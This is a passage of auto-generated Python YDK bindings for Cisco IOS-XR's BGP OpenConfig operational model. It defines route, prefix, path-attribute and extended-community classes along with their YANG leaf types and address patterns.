**config**\: False
.. attribute:: neighbor_address
Neighbor address
**type**\: union of the below types:
**type**\: str
**pattern:** (([0\-9]\|[1\-9][0\-9]\|1[0\-9][0\-9]\|2[0\-4][0\-9]\|25[0\-5])\\.){3}([0\-9]\|[1\-9][0\-9]\|1[0\-9][0\-9]\|2[0\-4][0\-9]\|25[0\-5])(%[\\p{N}\\p{L}]+)?
**type**\: str
**pattern:** ((\:\|[0\-9a\-fA\-F]{0,4})\:)([0\-9a\-fA\-F]{0,4}\:){0,5}((([0\-9a\-fA\-F]{0,4}\:)?(\:\|[0\-9a\-fA\-F]{0,4}))\|(((25[0\-5]\|2[0\-4][0\-9]\|[01]?[0\-9]?[0\-9])\\.){3}(25[0\-5]\|2[0\-4][0\-9]\|[01]?[0\-9]?[0\-9])))(%[\\p{N}\\p{L}]+)?
**config**\: False
.. attribute:: path_id
Path ID
**type**\: int
**range:** 0..4294967295
**config**\: False
.. attribute:: prefix_name
Prefix
**type**\: :py:class:`PrefixName <ydk.models.cisco_ios_xr.Cisco_IOS_XR_ipv4_bgp_oc_oper.OcBgp.BgpRib.AfiSafiTable.Ipv4Unicast.LocRib.Routes.Route.PrefixName>`
**config**\: False
.. attribute:: route_attr_list
RouteAttributesList
**type**\: :py:class:`RouteAttrList <ydk.models.cisco_ios_xr.Cisco_IOS_XR_ipv4_bgp_oc_oper.OcBgp.BgpRib.AfiSafiTable.Ipv4Unicast.LocRib.Routes.Route.RouteAttrList>`
**config**\: False
.. attribute:: ext_attributes_list
ExtAttributesList
**type**\: :py:class:`ExtAttributesList <ydk.models.cisco_ios_xr.Cisco_IOS_XR_ipv4_bgp_oc_oper.OcBgp.BgpRib.AfiSafiTable.Ipv4Unicast.LocRib.Routes.Route.ExtAttributesList>`
**config**\: False
.. attribute:: last_modified_date
LastModifiedDate
**type**\: :py:class:`LastModifiedDate <ydk.models.cisco_ios_xr.Cisco_IOS_XR_ipv4_bgp_oc_oper.OcBgp.BgpRib.AfiSafiTable.Ipv4Unicast.LocRib.Routes.Route.LastModifiedDate>`
**config**\: False
.. attribute:: last_update_recieved
LastUpdateRecieved
**type**\: :py:class:`LastUpdateRecieved <ydk.models.cisco_ios_xr.Cisco_IOS_XR_ipv4_bgp_oc_oper.OcBgp.BgpRib.AfiSafiTable.Ipv4Unicast.LocRib.Routes.Route.LastUpdateRecieved>`
**config**\: False
.. attribute:: valid_route
ValidRoute
**type**\: bool
**config**\: False
.. attribute:: invalid_reason
IndentityRef
**type**\: :py:class:`BgpOcInvalidRouteReason <ydk.models.cisco_ios_xr.Cisco_IOS_XR_ipv4_bgp_oc_oper.BgpOcInvalidRouteReason>`
**config**\: False
.. attribute:: best_path
BestPath
**type**\: bool
**config**\: False
"""
_prefix = 'ipv4-bgp-oc-oper'
_revision = '2017-09-07'
def __init__(self):
if sys.version_info > (3,):
super().__init__()
else:
super(OcBgp.BgpRib.AfiSafiTable.Ipv4Unicast.LocRib.Routes.Route, self).__init__()
self.yang_name = "route"
self.yang_parent_name = "routes"
self.is_top_level_class = False
self.has_list_ancestor = False
self.ylist_key_names = []
self._child_classes = OrderedDict([("prefix-name", ("prefix_name", OcBgp.BgpRib.AfiSafiTable.Ipv4Unicast.LocRib.Routes.Route.PrefixName)), ("route-attr-list", ("route_attr_list", OcBgp.BgpRib.AfiSafiTable.Ipv4Unicast.LocRib.Routes.Route.RouteAttrList)), ("ext-attributes-list", ("ext_attributes_list", OcBgp.BgpRib.AfiSafiTable.Ipv4Unicast.LocRib.Routes.Route.ExtAttributesList)), ("last-modified-date", ("last_modified_date", OcBgp.BgpRib.AfiSafiTable.Ipv4Unicast.LocRib.Routes.Route.LastModifiedDate)), ("last-update-recieved", ("last_update_recieved", OcBgp.BgpRib.AfiSafiTable.Ipv4Unicast.LocRib.Routes.Route.LastUpdateRecieved))])
self._leafs = OrderedDict([
('route', (YLeaf(YType.str, 'route'), ['str','str'])),
('neighbor_address', (YLeaf(YType.str, 'neighbor-address'), ['str','str'])),
('path_id', (YLeaf(YType.uint32, 'path-id'), ['int'])),
('valid_route', (YLeaf(YType.boolean, 'valid-route'), ['bool'])),
('invalid_reason', (YLeaf(YType.enumeration, 'invalid-reason'), [('ydk.models.cisco_ios_xr.Cisco_IOS_XR_ipv4_bgp_oc_oper', 'BgpOcInvalidRouteReason', '')])),
('best_path', (YLeaf(YType.boolean, 'best-path'), ['bool'])),
])
self.route = None
self.neighbor_address = None
self.path_id = None
self.valid_route = None
self.invalid_reason = None
self.best_path = None
self.prefix_name = OcBgp.BgpRib.AfiSafiTable.Ipv4Unicast.LocRib.Routes.Route.PrefixName()
self.prefix_name.parent = self
self._children_name_map["prefix_name"] = "prefix-name"
self.route_attr_list = OcBgp.BgpRib.AfiSafiTable.Ipv4Unicast.LocRib.Routes.Route.RouteAttrList()
self.route_attr_list.parent = self
self._children_name_map["route_attr_list"] = "route-attr-list"
self.ext_attributes_list = OcBgp.BgpRib.AfiSafiTable.Ipv4Unicast.LocRib.Routes.Route.ExtAttributesList()
self.ext_attributes_list.parent = self
self._children_name_map["ext_attributes_list"] = "ext-attributes-list"
self.last_modified_date = OcBgp.BgpRib.AfiSafiTable.Ipv4Unicast.LocRib.Routes.Route.LastModifiedDate()
self.last_modified_date.parent = self
self._children_name_map["last_modified_date"] = "last-modified-date"
self.last_update_recieved = OcBgp.BgpRib.AfiSafiTable.Ipv4Unicast.LocRib.Routes.Route.LastUpdateRecieved()
self.last_update_recieved.parent = self
self._children_name_map["last_update_recieved"] = "last-update-recieved"
self._segment_path = lambda: "route"
self._absolute_path = lambda: "Cisco-IOS-XR-ipv4-bgp-oc-oper:oc-bgp/bgp-rib/afi-safi-table/ipv4-unicast/loc-rib/routes/%s" % self._segment_path()
self._is_frozen = True
def __setattr__(self, name, value):
self._perform_setattr(OcBgp.BgpRib.AfiSafiTable.Ipv4Unicast.LocRib.Routes.Route, ['route', 'neighbor_address', 'path_id', 'valid_route', 'invalid_reason', 'best_path'], name, value)
class PrefixName(_Entity_):
"""
Prefix
.. attribute:: prefix
Prefix
**type**\: :py:class:`Prefix <ydk.models.cisco_ios_xr.Cisco_IOS_XR_ipv4_bgp_oc_oper.OcBgp.BgpRib.AfiSafiTable.Ipv4Unicast.LocRib.Routes.Route.PrefixName.Prefix>`
**config**\: False
.. attribute:: prefix_length
Prefix length
**type**\: int
**range:** 0..255
**config**\: False
"""
_prefix = 'ipv4-bgp-oc-oper'
_revision = '2017-09-07'
def __init__(self):
if sys.version_info > (3,):
super().__init__()
else:
super(OcBgp.BgpRib.AfiSafiTable.Ipv4Unicast.LocRib.Routes.Route.PrefixName, self).__init__()
self.yang_name = "prefix-name"
self.yang_parent_name = "route"
self.is_top_level_class = False
self.has_list_ancestor = False
self.ylist_key_names = []
self._child_classes = OrderedDict([("prefix", ("prefix", OcBgp.BgpRib.AfiSafiTable.Ipv4Unicast.LocRib.Routes.Route.PrefixName.Prefix))])
self._leafs = OrderedDict([
('prefix_length', (YLeaf(YType.uint8, 'prefix-length'), ['int'])),
])
self.prefix_length = None
self.prefix = OcBgp.BgpRib.AfiSafiTable.Ipv4Unicast.LocRib.Routes.Route.PrefixName.Prefix()
self.prefix.parent = self
self._children_name_map["prefix"] = "prefix"
self._segment_path = lambda: "prefix-name"
self._absolute_path = lambda: "Cisco-IOS-XR-ipv4-bgp-oc-oper:oc-bgp/bgp-rib/afi-safi-table/ipv4-unicast/loc-rib/routes/route/%s" % self._segment_path()
self._is_frozen = True
def __setattr__(self, name, value):
self._perform_setattr(OcBgp.BgpRib.AfiSafiTable.Ipv4Unicast.LocRib.Routes.Route.PrefixName, ['prefix_length'], name, value)
class Prefix(_Entity_):
"""
Prefix
.. attribute:: afi
AFI
**type**\: :py:class:`BgpOcAfi <ydk.models.cisco_ios_xr.Cisco_IOS_XR_ipv4_bgp_oc_oper.BgpOcAfi>`
**config**\: False
.. attribute:: ipv4_address
IPv4 Addr
**type**\: str
**pattern:** (([0\-9]\|[1\-9][0\-9]\|1[0\-9][0\-9]\|2[0\-4][0\-9]\|25[0\-5])\\.){3}([0\-9]\|[1\-9][0\-9]\|1[0\-9][0\-9]\|2[0\-4][0\-9]\|25[0\-5])(%[\\p{N}\\p{L}]+)?
**config**\: False
.. attribute:: ipv6_address
IPv6 Addr
**type**\: str
**pattern:** ((\:\|[0\-9a\-fA\-F]{0,4})\:)([0\-9a\-fA\-F]{0,4}\:){0,5}((([0\-9a\-fA\-F]{0,4}\:)?(\:\|[0\-9a\-fA\-F]{0,4}))\|(((25[0\-5]\|2[0\-4][0\-9]\|[01]?[0\-9]?[0\-9])\\.){3}(25[0\-5]\|2[0\-4][0\-9]\|[01]?[0\-9]?[0\-9])))(%[\\p{N}\\p{L}]+)?
**config**\: False
"""
_prefix = 'ipv4-bgp-oc-oper'
_revision = '2017-09-07'
def __init__(self):
if sys.version_info > (3,):
super().__init__()
else:
super(OcBgp.BgpRib.AfiSafiTable.Ipv4Unicast.LocRib.Routes.Route.PrefixName.Prefix, self).__init__()
self.yang_name = "prefix"
self.yang_parent_name = "prefix-name"
self.is_top_level_class = False
self.has_list_ancestor = False
self.ylist_key_names = []
self._child_classes = OrderedDict([])
self._leafs = OrderedDict([
('afi', (YLeaf(YType.enumeration, 'afi'), [('ydk.models.cisco_ios_xr.Cisco_IOS_XR_ipv4_bgp_oc_oper', 'BgpOcAfi', '')])),
('ipv4_address', (YLeaf(YType.str, 'ipv4-address'), ['str'])),
('ipv6_address', (YLeaf(YType.str, 'ipv6-address'), ['str'])),
])
self.afi = None
self.ipv4_address = None
self.ipv6_address = None
self._segment_path = lambda: "prefix"
self._absolute_path = lambda: "Cisco-IOS-XR-ipv4-bgp-oc-oper:oc-bgp/bgp-rib/afi-safi-table/ipv4-unicast/loc-rib/routes/route/prefix-name/%s" % self._segment_path()
self._is_frozen = True
def __setattr__(self, name, value):
self._perform_setattr(OcBgp.BgpRib.AfiSafiTable.Ipv4Unicast.LocRib.Routes.Route.PrefixName.Prefix, ['afi', 'ipv4_address', 'ipv6_address'], name, value)
@staticmethod
def _meta_info():
from ydk.models.cisco_ios_xr._meta import _Cisco_IOS_XR_ipv4_bgp_oc_oper as meta
return meta._meta_table['OcBgp.BgpRib.AfiSafiTable.Ipv4Unicast.LocRib.Routes.Route.PrefixName.Prefix']['meta_info']
@staticmethod
def _meta_info():
from ydk.models.cisco_ios_xr._meta import _Cisco_IOS_XR_ipv4_bgp_oc_oper as meta
return meta._meta_table['OcBgp.BgpRib.AfiSafiTable.Ipv4Unicast.LocRib.Routes.Route.PrefixName']['meta_info']
class RouteAttrList(_Entity_):
"""
RouteAttributesList
.. attribute:: next_hop
NextHopAddress
**type**\: :py:class:`NextHop <ydk.models.cisco_ios_xr.Cisco_IOS_XR_ipv4_bgp_oc_oper.OcBgp.BgpRib.AfiSafiTable.Ipv4Unicast.LocRib.Routes.Route.RouteAttrList.NextHop>`
**config**\: False
.. attribute:: aggregrator_attributes
AggregatorList
**type**\: :py:class:`AggregratorAttributes <ydk.models.cisco_ios_xr.Cisco_IOS_XR_ipv4_bgp_oc_oper.OcBgp.BgpRib.AfiSafiTable.Ipv4Unicast.LocRib.Routes.Route.RouteAttrList.AggregratorAttributes>`
**config**\: False
.. attribute:: origin_type
Origin Attribute Type
**type**\: :py:class:`BgpOcOriginAttr <ydk.models.cisco_ios_xr.Cisco_IOS_XR_ipv4_bgp_oc_oper.BgpOcOriginAttr>`
**config**\: False
.. attribute:: as_path
AS Path
**type**\: str
**config**\: False
.. attribute:: as4_path
AS4 Path
**type**\: str
**config**\: False
.. attribute:: med
Med
**type**\: int
**range:** 0..4294967295
**config**\: False
.. attribute:: local_pref
LocalPref
**type**\: int
**range:** 0..4294967295
**config**\: False
.. attribute:: atomic_aggr
AtomicAggr
**type**\: bool
**config**\: False
.. attribute:: community
CommunityArray
**type**\: list of :py:class:`Community <ydk.models.cisco_ios_xr.Cisco_IOS_XR_ipv4_bgp_oc_oper.OcBgp.BgpRib.AfiSafiTable.Ipv4Unicast.LocRib.Routes.Route.RouteAttrList.Community>`
**config**\: False
"""
_prefix = 'ipv4-bgp-oc-oper'
_revision = '2017-09-07'
def __init__(self):
if sys.version_info > (3,):
super().__init__()
else:
super(OcBgp.BgpRib.AfiSafiTable.Ipv4Unicast.LocRib.Routes.Route.RouteAttrList, self).__init__()
self.yang_name = "route-attr-list"
self.yang_parent_name = "route"
self.is_top_level_class = False
self.has_list_ancestor = False
self.ylist_key_names = []
self._child_classes = OrderedDict([("next-hop", ("next_hop", OcBgp.BgpRib.AfiSafiTable.Ipv4Unicast.LocRib.Routes.Route.RouteAttrList.NextHop)), ("aggregrator-attributes", ("aggregrator_attributes", OcBgp.BgpRib.AfiSafiTable.Ipv4Unicast.LocRib.Routes.Route.RouteAttrList.AggregratorAttributes)), ("community", ("community", OcBgp.BgpRib.AfiSafiTable.Ipv4Unicast.LocRib.Routes.Route.RouteAttrList.Community))])
self._leafs = OrderedDict([
('origin_type', (YLeaf(YType.enumeration, 'origin-type'), [('ydk.models.cisco_ios_xr.Cisco_IOS_XR_ipv4_bgp_oc_oper', 'BgpOcOriginAttr', '')])),
('as_path', (YLeaf(YType.str, 'as-path'), ['str'])),
('as4_path', (YLeaf(YType.str, 'as4-path'), ['str'])),
('med', (YLeaf(YType.uint32, 'med'), ['int'])),
('local_pref', (YLeaf(YType.uint32, 'local-pref'), ['int'])),
('atomic_aggr', (YLeaf(YType.boolean, 'atomic-aggr'), ['bool'])),
])
self.origin_type = None
self.as_path = None
self.as4_path = None
self.med = None
self.local_pref = None
self.atomic_aggr = None
self.next_hop = OcBgp.BgpRib.AfiSafiTable.Ipv4Unicast.LocRib.Routes.Route.RouteAttrList.NextHop()
self.next_hop.parent = self
self._children_name_map["next_hop"] = "next-hop"
self.aggregrator_attributes = OcBgp.BgpRib.AfiSafiTable.Ipv4Unicast.LocRib.Routes.Route.RouteAttrList.AggregratorAttributes()
self.aggregrator_attributes.parent = self
self._children_name_map["aggregrator_attributes"] = "aggregrator-attributes"
self.community = YList(self)
self._segment_path = lambda: "route-attr-list"
self._absolute_path = lambda: "Cisco-IOS-XR-ipv4-bgp-oc-oper:oc-bgp/bgp-rib/afi-safi-table/ipv4-unicast/loc-rib/routes/route/%s" % self._segment_path()
self._is_frozen = True
def __setattr__(self, name, value):
self._perform_setattr(OcBgp.BgpRib.AfiSafiTable.Ipv4Unicast.LocRib.Routes.Route.RouteAttrList, ['origin_type', 'as_path', 'as4_path', 'med', 'local_pref', 'atomic_aggr'], name, value)
class NextHop(_Entity_):
"""
NextHopAddress
.. attribute:: afi
AFI
**type**\: :py:class:`BgpOcAfi <ydk.models.cisco_ios_xr.Cisco_IOS_XR_ipv4_bgp_oc_oper.BgpOcAfi>`
**config**\: False
.. attribute:: ipv4_address
IPv4 Addr
**type**\: str
**pattern:** (([0\-9]\|[1\-9][0\-9]\|1[0\-9][0\-9]\|2[0\-4][0\-9]\|25[0\-5])\\.){3}([0\-9]\|[1\-9][0\-9]\|1[0\-9][0\-9]\|2[0\-4][0\-9]\|25[0\-5])(%[\\p{N}\\p{L}]+)?
**config**\: False
.. attribute:: ipv6_address
IPv6 Addr
**type**\: str
**pattern:** ((\:\|[0\-9a\-fA\-F]{0,4})\:)([0\-9a\-fA\-F]{0,4}\:){0,5}((([0\-9a\-fA\-F]{0,4}\:)?(\:\|[0\-9a\-fA\-F]{0,4}))\|(((25[0\-5]\|2[0\-4][0\-9]\|[01]?[0\-9]?[0\-9])\\.){3}(25[0\-5]\|2[0\-4][0\-9]\|[01]?[0\-9]?[0\-9])))(%[\\p{N}\\p{L}]+)?
**config**\: False
"""
_prefix = 'ipv4-bgp-oc-oper'
_revision = '2017-09-07'
def __init__(self):
if sys.version_info > (3,):
super().__init__()
else:
super(OcBgp.BgpRib.AfiSafiTable.Ipv4Unicast.LocRib.Routes.Route.RouteAttrList.NextHop, self).__init__()
self.yang_name = "next-hop"
self.yang_parent_name = "route-attr-list"
self.is_top_level_class = False
self.has_list_ancestor = False
self.ylist_key_names = []
self._child_classes = OrderedDict([])
self._leafs = OrderedDict([
('afi', (YLeaf(YType.enumeration, 'afi'), [('ydk.models.cisco_ios_xr.Cisco_IOS_XR_ipv4_bgp_oc_oper', 'BgpOcAfi', '')])),
('ipv4_address', (YLeaf(YType.str, 'ipv4-address'), ['str'])),
('ipv6_address', (YLeaf(YType.str, 'ipv6-address'), ['str'])),
])
self.afi = None
self.ipv4_address = None
self.ipv6_address = None
self._segment_path = lambda: "next-hop"
self._absolute_path = lambda: "Cisco-IOS-XR-ipv4-bgp-oc-oper:oc-bgp/bgp-rib/afi-safi-table/ipv4-unicast/loc-rib/routes/route/route-attr-list/%s" % self._segment_path()
self._is_frozen = True
def __setattr__(self, name, value):
self._perform_setattr(OcBgp.BgpRib.AfiSafiTable.Ipv4Unicast.LocRib.Routes.Route.RouteAttrList.NextHop, ['afi', 'ipv4_address', 'ipv6_address'], name, value)
@staticmethod
def _meta_info():
from ydk.models.cisco_ios_xr._meta import _Cisco_IOS_XR_ipv4_bgp_oc_oper as meta
return meta._meta_table['OcBgp.BgpRib.AfiSafiTable.Ipv4Unicast.LocRib.Routes.Route.RouteAttrList.NextHop']['meta_info']
class AggregratorAttributes(_Entity_):
    """
    AggregatorList

    .. attribute:: as_

        AS number

        **type**\: int

        **range:** 0..4294967295

        **config**\: False

    .. attribute:: as4

        AS4 number

        **type**\: int

        **range:** 0..4294967295

        **config**\: False

    .. attribute:: address

        IPv4 address

        **type**\: str

        **pattern:** (([0\-9]\|[1\-9][0\-9]\|1[0\-9][0\-9]\|2[0\-4][0\-9]\|25[0\-5])\\.){3}([0\-9]\|[1\-9][0\-9]\|1[0\-9][0\-9]\|2[0\-4][0\-9]\|25[0\-5])(%[\\p{N}\\p{L}]+)?

        **config**\: False

    """

    # YANG module prefix and revision this binding was generated from.
    _prefix = 'ipv4-bgp-oc-oper'
    _revision = '2017-09-07'

    def __init__(self):
        # super() call spelled both ways for Python 2 / Python 3 compatibility.
        if sys.version_info > (3,):
            super().__init__()
        else:
            super(OcBgp.BgpRib.AfiSafiTable.Ipv4Unicast.LocRib.Routes.Route.RouteAttrList.AggregratorAttributes, self).__init__()

        self.yang_name = "aggregrator-attributes"
        self.yang_parent_name = "route-attr-list"
        self.is_top_level_class = False
        self.has_list_ancestor = False
        self.ylist_key_names = []
        # No child containers under this node.
        self._child_classes = OrderedDict([])
        # Leaf attribute name -> (YLeaf descriptor, accepted Python types).
        self._leafs = OrderedDict([
            ('as_', (YLeaf(YType.uint32, 'as'), ['int'])),
            ('as4', (YLeaf(YType.uint32, 'as4'), ['int'])),
            ('address', (YLeaf(YType.str, 'address'), ['str'])),
        ])
        self.as_ = None
        self.as4 = None
        self.address = None
        self._segment_path = lambda: "aggregrator-attributes"
        self._absolute_path = lambda: "Cisco-IOS-XR-ipv4-bgp-oc-oper:oc-bgp/bgp-rib/afi-safi-table/ipv4-unicast/loc-rib/routes/route/route-attr-list/%s" % self._segment_path()
        # Freeze the entity: further writes are checked by __setattr__ below.
        self._is_frozen = True

    def __setattr__(self, name, value):
        # Only the listed leaf names may be assigned after construction.
        self._perform_setattr(OcBgp.BgpRib.AfiSafiTable.Ipv4Unicast.LocRib.Routes.Route.RouteAttrList.AggregratorAttributes, ['as_', 'as4', 'address'], name, value)

    @staticmethod
    def _meta_info():
        from ydk.models.cisco_ios_xr._meta import _Cisco_IOS_XR_ipv4_bgp_oc_oper as meta
        return meta._meta_table['OcBgp.BgpRib.AfiSafiTable.Ipv4Unicast.LocRib.Routes.Route.RouteAttrList.AggregratorAttributes']['meta_info']
class Community(_Entity_):
    """
    CommunityArray

    .. attribute:: objects

        BGP OC objects

        **type**\: str

        **config**\: False

    """

    # YANG module prefix and revision this binding was generated from.
    _prefix = 'ipv4-bgp-oc-oper'
    _revision = '2017-09-07'

    def __init__(self):
        # super() call spelled both ways for Python 2 / Python 3 compatibility.
        if sys.version_info > (3,):
            super().__init__()
        else:
            super(OcBgp.BgpRib.AfiSafiTable.Ipv4Unicast.LocRib.Routes.Route.RouteAttrList.Community, self).__init__()

        self.yang_name = "community"
        self.yang_parent_name = "route-attr-list"
        self.is_top_level_class = False
        self.has_list_ancestor = False
        self.ylist_key_names = []
        # No child containers under this node.
        self._child_classes = OrderedDict([])
        # Leaf attribute name -> (YLeaf descriptor, accepted Python types).
        self._leafs = OrderedDict([
            ('objects', (YLeaf(YType.str, 'objects'), ['str'])),
        ])
        self.objects = None
        self._segment_path = lambda: "community"
        self._absolute_path = lambda: "Cisco-IOS-XR-ipv4-bgp-oc-oper:oc-bgp/bgp-rib/afi-safi-table/ipv4-unicast/loc-rib/routes/route/route-attr-list/%s" % self._segment_path()
        # Freeze the entity: further writes are checked by __setattr__ below.
        self._is_frozen = True

    def __setattr__(self, name, value):
        # Only 'objects' may be assigned after construction.
        self._perform_setattr(OcBgp.BgpRib.AfiSafiTable.Ipv4Unicast.LocRib.Routes.Route.RouteAttrList.Community, ['objects'], name, value)

    @staticmethod
    def _meta_info():
        from ydk.models.cisco_ios_xr._meta import _Cisco_IOS_XR_ipv4_bgp_oc_oper as meta
        return meta._meta_table['OcBgp.BgpRib.AfiSafiTable.Ipv4Unicast.LocRib.Routes.Route.RouteAttrList.Community']['meta_info']
@staticmethod
def _meta_info():
    """Return the generated meta-model entry for the RouteAttrList container."""
    # Imported lazily so the (large) _meta package is only loaded on demand.
    from ydk.models.cisco_ios_xr._meta import _Cisco_IOS_XR_ipv4_bgp_oc_oper as meta
    entry = meta._meta_table['OcBgp.BgpRib.AfiSafiTable.Ipv4Unicast.LocRib.Routes.Route.RouteAttrList']
    return entry['meta_info']
class ExtAttributesList(_Entity_):
    """
    ExtAttributesList

    .. attribute:: originator_id

        OriginatorID

        **type**\: str

        **pattern:** (([0\-9]\|[1\-9][0\-9]\|1[0\-9][0\-9]\|2[0\-4][0\-9]\|25[0\-5])\\.){3}([0\-9]\|[1\-9][0\-9]\|1[0\-9][0\-9]\|2[0\-4][0\-9]\|25[0\-5])(%[\\p{N}\\p{L}]+)?

        **config**\: False

    .. attribute:: aigp

        AIGP

        **type**\: int

        **range:** 0..18446744073709551615

        **config**\: False

    .. attribute:: path_id

        PathId

        **type**\: int

        **range:** 0..4294967295

        **config**\: False

    .. attribute:: cluster

        ClusterList

        **type**\: list of str

        **pattern:** (([0\-9]\|[1\-9][0\-9]\|1[0\-9][0\-9]\|2[0\-4][0\-9]\|25[0\-5])\\.){3}([0\-9]\|[1\-9][0\-9]\|1[0\-9][0\-9]\|2[0\-4][0\-9]\|25[0\-5])(%[\\p{N}\\p{L}]+)?

        **config**\: False

    .. attribute:: ext_community

        ExtendedCommunityArray

        **type**\: list of :py:class:`ExtCommunity <ydk.models.cisco_ios_xr.Cisco_IOS_XR_ipv4_bgp_oc_oper.OcBgp.BgpRib.AfiSafiTable.Ipv4Unicast.LocRib.Routes.Route.ExtAttributesList.ExtCommunity>`

        **config**\: False

    .. attribute:: unknown_attributes

        UnknownAttributes

        **type**\: list of :py:class:`UnknownAttributes <ydk.models.cisco_ios_xr.Cisco_IOS_XR_ipv4_bgp_oc_oper.OcBgp.BgpRib.AfiSafiTable.Ipv4Unicast.LocRib.Routes.Route.ExtAttributesList.UnknownAttributes>`

        **config**\: False

    """

    # YANG module prefix and revision this binding was generated from.
    _prefix = 'ipv4-bgp-oc-oper'
    _revision = '2017-09-07'

    def __init__(self):
        # super() call spelled both ways for Python 2 / Python 3 compatibility.
        if sys.version_info > (3,):
            super().__init__()
        else:
            super(OcBgp.BgpRib.AfiSafiTable.Ipv4Unicast.LocRib.Routes.Route.ExtAttributesList, self).__init__()

        self.yang_name = "ext-attributes-list"
        self.yang_parent_name = "route"
        self.is_top_level_class = False
        self.has_list_ancestor = False
        self.ylist_key_names = []
        # YANG child name -> (python attribute name, binding class).
        self._child_classes = OrderedDict([("ext-community", ("ext_community", OcBgp.BgpRib.AfiSafiTable.Ipv4Unicast.LocRib.Routes.Route.ExtAttributesList.ExtCommunity)), ("unknown-attributes", ("unknown_attributes", OcBgp.BgpRib.AfiSafiTable.Ipv4Unicast.LocRib.Routes.Route.ExtAttributesList.UnknownAttributes))])
        # Leaf attribute name -> (YLeaf/YLeafList descriptor, accepted Python types).
        self._leafs = OrderedDict([
            ('originator_id', (YLeaf(YType.str, 'originator-id'), ['str'])),
            ('aigp', (YLeaf(YType.uint64, 'aigp'), ['int'])),
            ('path_id', (YLeaf(YType.uint32, 'path-id'), ['int'])),
            ('cluster', (YLeafList(YType.str, 'cluster'), ['str'])),
        ])
        self.originator_id = None
        self.aigp = None
        self.path_id = None
        self.cluster = []
        # List children are YList containers bound to this parent entity.
        self.ext_community = YList(self)
        self.unknown_attributes = YList(self)
        self._segment_path = lambda: "ext-attributes-list"
        self._absolute_path = lambda: "Cisco-IOS-XR-ipv4-bgp-oc-oper:oc-bgp/bgp-rib/afi-safi-table/ipv4-unicast/loc-rib/routes/route/%s" % self._segment_path()
        # Freeze the entity: further writes are checked by __setattr__ below.
        self._is_frozen = True

    def __setattr__(self, name, value):
        # Only the listed leaf names may be assigned after construction.
        self._perform_setattr(OcBgp.BgpRib.AfiSafiTable.Ipv4Unicast.LocRib.Routes.Route.ExtAttributesList, ['originator_id', 'aigp', 'path_id', 'cluster'], name, value)

    class ExtCommunity(_Entity_):
        """
        ExtendedCommunityArray

        .. attribute:: objects

            BGP OC objects

            **type**\: str

            **config**\: False

        """

        _prefix = 'ipv4-bgp-oc-oper'
        _revision = '2017-09-07'

        def __init__(self):
            # super() call spelled both ways for Python 2 / Python 3 compatibility.
            if sys.version_info > (3,):
                super().__init__()
            else:
                super(OcBgp.BgpRib.AfiSafiTable.Ipv4Unicast.LocRib.Routes.Route.ExtAttributesList.ExtCommunity, self).__init__()

            self.yang_name = "ext-community"
            self.yang_parent_name = "ext-attributes-list"
            self.is_top_level_class = False
            self.has_list_ancestor = False
            self.ylist_key_names = []
            self._child_classes = OrderedDict([])
            self._leafs = OrderedDict([
                ('objects', (YLeaf(YType.str, 'objects'), ['str'])),
            ])
            self.objects = None
            self._segment_path = lambda: "ext-community"
            self._absolute_path = lambda: "Cisco-IOS-XR-ipv4-bgp-oc-oper:oc-bgp/bgp-rib/afi-safi-table/ipv4-unicast/loc-rib/routes/route/ext-attributes-list/%s" % self._segment_path()
            self._is_frozen = True

        def __setattr__(self, name, value):
            self._perform_setattr(OcBgp.BgpRib.AfiSafiTable.Ipv4Unicast.LocRib.Routes.Route.ExtAttributesList.ExtCommunity, ['objects'], name, value)

        @staticmethod
        def _meta_info():
            from ydk.models.cisco_ios_xr._meta import _Cisco_IOS_XR_ipv4_bgp_oc_oper as meta
            return meta._meta_table['OcBgp.BgpRib.AfiSafiTable.Ipv4Unicast.LocRib.Routes.Route.ExtAttributesList.ExtCommunity']['meta_info']

    class UnknownAttributes(_Entity_):
        """
        UnknownAttributes

        .. attribute:: attribute_type

            AttributeType

            **type**\: int

            **range:** 0..65535

            **config**\: False

        .. attribute:: attribute_length

            AttributeLength

            **type**\: int

            **range:** 0..65535

            **config**\: False

        .. attribute:: attribute_value

            Atributevalue

            **type**\: str

            **pattern:** ([0\-9a\-fA\-F]{2}(\:[0\-9a\-fA\-F]{2})\*)?

            **config**\: False

        """

        _prefix = 'ipv4-bgp-oc-oper'
        _revision = '2017-09-07'

        def __init__(self):
            # super() call spelled both ways for Python 2 / Python 3 compatibility.
            if sys.version_info > (3,):
                super().__init__()
            else:
                super(OcBgp.BgpRib.AfiSafiTable.Ipv4Unicast.LocRib.Routes.Route.ExtAttributesList.UnknownAttributes, self).__init__()

            self.yang_name = "unknown-attributes"
            self.yang_parent_name = "ext-attributes-list"
            self.is_top_level_class = False
            self.has_list_ancestor = False
            self.ylist_key_names = []
            self._child_classes = OrderedDict([])
            self._leafs = OrderedDict([
                ('attribute_type', (YLeaf(YType.uint16, 'attribute-type'), ['int'])),
                ('attribute_length', (YLeaf(YType.uint16, 'attribute-length'), ['int'])),
                ('attribute_value', (YLeaf(YType.str, 'attribute-value'), ['str'])),
            ])
            self.attribute_type = None
            self.attribute_length = None
            self.attribute_value = None
            self._segment_path = lambda: "unknown-attributes"
            self._absolute_path = lambda: "Cisco-IOS-XR-ipv4-bgp-oc-oper:oc-bgp/bgp-rib/afi-safi-table/ipv4-unicast/loc-rib/routes/route/ext-attributes-list/%s" % self._segment_path()
            self._is_frozen = True

        def __setattr__(self, name, value):
            self._perform_setattr(OcBgp.BgpRib.AfiSafiTable.Ipv4Unicast.LocRib.Routes.Route.ExtAttributesList.UnknownAttributes, ['attribute_type', 'attribute_length', 'attribute_value'], name, value)

        @staticmethod
        def _meta_info():
            from ydk.models.cisco_ios_xr._meta import _Cisco_IOS_XR_ipv4_bgp_oc_oper as meta
            return meta._meta_table['OcBgp.BgpRib.AfiSafiTable.Ipv4Unicast.LocRib.Routes.Route.ExtAttributesList.UnknownAttributes']['meta_info']

    @staticmethod
    def _meta_info():
        from ydk.models.cisco_ios_xr._meta import _Cisco_IOS_XR_ipv4_bgp_oc_oper as meta
        return meta._meta_table['OcBgp.BgpRib.AfiSafiTable.Ipv4Unicast.LocRib.Routes.Route.ExtAttributesList']['meta_info']
class LastModifiedDate(_Entity_):
    """
    LastModifiedDate

    .. attribute:: time_value

        TimeValue

        **type**\: str

        **config**\: False

    """

    # YANG module prefix and revision this binding was generated from.
    _prefix = 'ipv4-bgp-oc-oper'
    _revision = '2017-09-07'

    def __init__(self):
        # super() call spelled both ways for Python 2 / Python 3 compatibility.
        if sys.version_info > (3,):
            super().__init__()
        else:
